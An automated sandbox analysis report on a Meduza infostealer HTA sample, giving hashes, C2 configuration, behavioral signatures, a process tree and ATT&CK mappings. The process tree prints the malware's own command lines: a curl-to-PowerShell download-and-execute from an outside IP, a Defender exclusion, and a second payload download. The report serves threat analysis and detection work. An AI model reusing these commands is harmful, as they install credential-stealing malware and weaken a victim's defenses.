Analysis
Max time kernel: 94s
Max time network: 142s
Platform: windows10-2004_x64
Resource: win10v2004-20241007-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 20-12-2024 02:06
Static task: static1
Behavioral task: behavioral1
Sample: 054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f.hta
Resource: win7-20240903-en
General
Target: 054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f.hta
Size: 551B
MD5: 4041595b42e7b6e2ce5965cb76ea7da1
SHA1: 401723ee1ac651ad359b89dd7e3cefea91d6aaa9
SHA256: 054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
SHA512: 84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19
Malware Config
Extracted
Family: meduza
C2: 193.3.19.151
anti_dbg: true
anti_vm: true
build_name: hdont
extensions: .txt
grabber_max_size: 4.194304e+06
port: 15666
self_destruct: false
Signatures

Meduza Stealer payload (1 IoC)
  resource | yara_rule
  behavioral2/files/0x0008000000023cb8-93.dat | family_meduza

Meduza family

Blocklisted process makes network request (2 IoCs)
  flow | pid | Process
  16 | 2644 | powershell.exe
  19 | 3044 | powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  4324 | powershell.exe
  2644 | powershell.exe
  3044 | powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | mshta.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | Launcher.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | hcrzecmm.tv4.exe

Executes dropped EXE (2 IoCs)
  pid | Process
  1700 | Launcher.exe
  2268 | hcrzecmm.tv4.exe

Loads dropped DLL (3 IoCs)
  pid | Process
  1700 | Launcher.exe
  1700 | Launcher.exe
  1700 | Launcher.exe

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTP, 5 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | hcrzecmm.tv4.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | hcrzecmm.tv4.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | hcrzecmm.tv4.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | hcrzecmm.tv4.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | hcrzecmm.tv4.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  21 | api.ipify.org
  22 | api.ipify.org

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Launcher.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Modifies registry class (5 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000}\AppID = "{00000000-0000-0000-0000-000000000000}" | Launcher.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000} | Launcher.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\ = "{00000000-0000-0000-0000-000000000000}" | Launcher.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\LaunchPermission = 01000480640000008000000000000000140000000200500003000000000014000100000001010000000000050400000000001800010000000102000000000005200000002002000000001400010000000101000000000005120000000000002009000000010500000000000515000000a9fce1df98620cba7133e4fee8030000010500000000000515000000a9fce1df98620cba7133e4fe01020000 | Launcher.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000} | Launcher.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid | Process
  2644 | powershell.exe
  2644 | powershell.exe
  4324 | powershell.exe
  4324 | powershell.exe
  3044 | powershell.exe
  3044 | powershell.exe
  2268 | hcrzecmm.tv4.exe
  2268 | hcrzecmm.tv4.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2644 | powershell.exe
  Token: SeDebugPrivilege | 4324 | powershell.exe
  Token: SeDebugPrivilege | 3044 | powershell.exe
  Token: SeDebugPrivilege | 2268 | hcrzecmm.tv4.exe
  Token: SeImpersonatePrivilege | 2268 | hcrzecmm.tv4.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
  pid | Process
  1700 | Launcher.exe
  1700 | Launcher.exe
  1700 | Launcher.exe

Suspicious use of WriteProcessMemory (20 IoCs)
  description | pid | Process | procid_target
  PID 540 wrote to memory of 3848 | 540 | mshta.exe | 82
  PID 540 wrote to memory of 3848 | 540 | mshta.exe | 82
  PID 540 wrote to memory of 3848 | 540 | mshta.exe | 82
  PID 3848 wrote to memory of 1508 | 3848 | cmd.exe | 84
  PID 3848 wrote to memory of 1508 | 3848 | cmd.exe | 84
  PID 3848 wrote to memory of 1508 | 3848 | cmd.exe | 84
  PID 3848 wrote to memory of 2644 | 3848 | cmd.exe | 85
  PID 3848 wrote to memory of 2644 | 3848 | cmd.exe | 85
  PID 3848 wrote to memory of 2644 | 3848 | cmd.exe | 85
  PID 2644 wrote to memory of 1700 | 2644 | powershell.exe | 86
  PID 2644 wrote to memory of 1700 | 2644 | powershell.exe | 86
  PID 2644 wrote to memory of 1700 | 2644 | powershell.exe | 86
  PID 1700 wrote to memory of 4324 | 1700 | Launcher.exe | 87
  PID 1700 wrote to memory of 4324 | 1700 | Launcher.exe | 87
  PID 1700 wrote to memory of 4324 | 1700 | Launcher.exe | 87
  PID 1700 wrote to memory of 3044 | 1700 | Launcher.exe | 92
  PID 1700 wrote to memory of 3044 | 1700 | Launcher.exe | 92
  PID 1700 wrote to memory of 3044 | 1700 | Launcher.exe | 92
  PID 1700 wrote to memory of 2268 | 1700 | Launcher.exe | 96
  PID 1700 wrote to memory of 2268 | 1700 | Launcher.exe | 96

outlook_office_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | hcrzecmm.tv4.exe

outlook_win_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | hcrzecmm.tv4.exe
Processes

mshta.exe (PID 540)
  Path: C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  cmd.exe (PID 3848)
    Path: C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    curl.exe (PID 1508)
      Path: C:\Windows\SysWOW64\curl.exe
      Command line: curl -s http://147.45.47.15/script.ps1

    powershell.exe (PID 2644)
      Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command -
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      Launcher.exe (PID 1700)
        Path: C:\Windows\Temp\Launcher.exe
        Command line: "C:\Windows\Temp\Launcher.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Modifies registry class
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        powershell.exe (PID 4324)
          Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        powershell.exe (PID 3044)
          Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\hcrzecmm.tv4.exe'"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        hcrzecmm.tv4.exe (PID 2268)
          Path: C:\Windows\Temp\hcrzecmm.tv4.exe
          Command line: "C:\Windows\Temp\hcrzecmm.tv4.exe"
          - Checks computer location settings
          - Executes dropped EXE
          - Accesses Microsoft Outlook profiles
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - outlook_office_path
          - outlook_win_path
Network

MITRE ATT&CK Enterprise v15
Credential Access
  - Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
  - Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads